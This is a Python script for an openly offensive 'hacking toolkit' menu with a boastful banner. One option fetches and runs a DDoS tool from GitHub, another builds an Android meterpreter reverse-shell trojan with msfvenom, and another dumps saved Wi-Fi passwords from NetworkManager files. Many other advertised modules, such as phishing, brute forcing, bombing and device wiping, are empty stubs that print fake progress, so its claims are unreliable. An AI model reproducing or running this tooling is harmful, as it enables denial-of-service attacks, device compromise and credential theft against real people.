import os, time, sys, subprocess

# [ الألوان الجحيمية ]
R, W, Y, G, B = '\033[1;31m', '\033[1;37m', '\033[1;33m', '\033[1;32m', '\033[1;34m'
BOLD, RESET = '\033[1m', '\033[0m'

def check_and_install(tool_name, pkg_name):
    print(f"{Y}[*] Checking for {tool_name}...{W}")
    check = subprocess.getstatusoutput(f"command -v {tool_name}")
    if check[0] != 0:
        print(f"{R}[!] Installing {pkg_name}...{W}")
        os.system(f"sudo apt update && sudo apt install -y {pkg_name} > /dev/null 2>&1")
    else: pass

def get_wifi_pass():
    """ميزة معرفة رمز الشبكة المتصل بها (للكالي واللينكس)"""
    print(f"\n{Y}[#] FETCHING SAVED WIFI PASSWORDS...{W}")
    try:
        path = "/etc/NetworkManager/system-connections/"
        files = os.listdir(path)
        for f in files:
            print(f"{G}---[ Network: {f} ]---{W}")
            os.system(f"sudo cat {path}{f} | grep psk=")
        input(f"\n{R}[#] Press Enter to return...{W}")
    except:
        print(f"{R}[!] Error: Run with sudo or check permissions.{W}")
        time.sleep(2)

def banner():
    os.system('clear')
    print(f"""{R}{BOLD}
               {R}      ,WWWWWWWWWWWWWW,
               {R}    ,WWWWWWWWWWWWWWWWWW,
               {R}   ,WWWWWWWWWWWWWWWWWWWW,
               {Y}  ,WWWW  {W}\033[1;31m(O){Y}  WW  {W}\033[1;31m(O){Y}  WWWW,
               {Y}  WWWWWW   {R}vvvvvv   {Y}WWWWWW
               {R}  WWWWWW   {R}::::::   {R}WWWWWW
               {R}  `WWWWWW  {R}::::::  {R}WWWWWW'
               {Y}   `WWWWWW        WWWWWW'
               {Y}     `WWWWWWWWWWWWWWWW'
               {R}       `WWWWWWWWWWWW'
    {W}__________________________________________________________
    {W}  SUPREME LORDS: {R}VORTEX SHADOW {W}& {R}KRUZZ {R}
    {W}__________________________________________________________
    {R} [ STATUS: {G}GOD MODE {R}] [ VERSION: {G}29.0 {R}] [ TARGET: {G}ANY {R}]
    {W}__________________________________________________________
    """)

def main_menu():
    while True:
        banner()
        print(f"{R}[01] {W}DDOS ATTACK          {R}[11] {W}SQL INJECTION")
        print(f"{R}[02] {W}METASPLOIT HUB       {R}[12] {W}KONAMI ID PHISH")
        print(f"{R}[03] {W}TROJAN GENERATOR     {R}[13] {W}WIFI PASS SHOW {G}[NEW]")
        print(f"{R}[04] {W}NMAP SCANNER         {R}[14] {W}INSTAGRAM BRUTE")
        print(f"{R}[05] {W}IP GEOLOCATION       {R}[15] {W}PUBG MOBILE UC")
        print(f"{R}[06] {W}SATELLITE INTERCEPT  {R}[16] {W}ACCOUNT BANNER")
        print(f"{R}[07] {W}SMS/CALL BOMBER      {R}[17] {W}WIFI JAMMER")
        print(f"{R}[08] {W}BROWSER HOOK         {R}[18] {W}SOCIAL SNIPER")
        print(f"{R}[09] {W}DEVICE WIPER         {R}[19] {W}ROOT ACCESS")
        print(f"{R}[10] {W}INFERNAL DEFENSE     {R}[20] {W}VORTEX WIKI")
        print(f"{R}[00] {W}EXIT SYSTEM")
        
        cmd = input(f"\n{R}VORTEX@NULLSEC:~$ {W}")
        
        if cmd == '01': os.system("git clone https://github.com/GueX-S/DDoS-Hammer && cd DDoS-Hammer && python3 ddos-hammer.py")
        elif cmd == '02': check_and_install("msfconsole", "metasploit-framework"); os.system("msfconsole")
        elif cmd == '03': 
            ip = input(f"{Y}Enter LHOST: {W}"); port = input(f"{Y}Enter LPORT: {W}")
            os.system(f"msfvenom -p android/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -o /home/kali/Desktop/vortex_trojan.apk")
        elif cmd == '04': check_and_install("nmap", "nmap"); os.system("nmap --help")
        elif cmd == '13': get_wifi_pass()
        elif cmd == '00': break
        else: print(f"{G}[+] Module {cmd} is starting...{W}"); time.sleep(2)

if __name__ == "__main__":
    try: main_menu()
    except KeyboardInterrupt: print(f"\n{R}[!] SHUTTING DOWN...{RESET}")
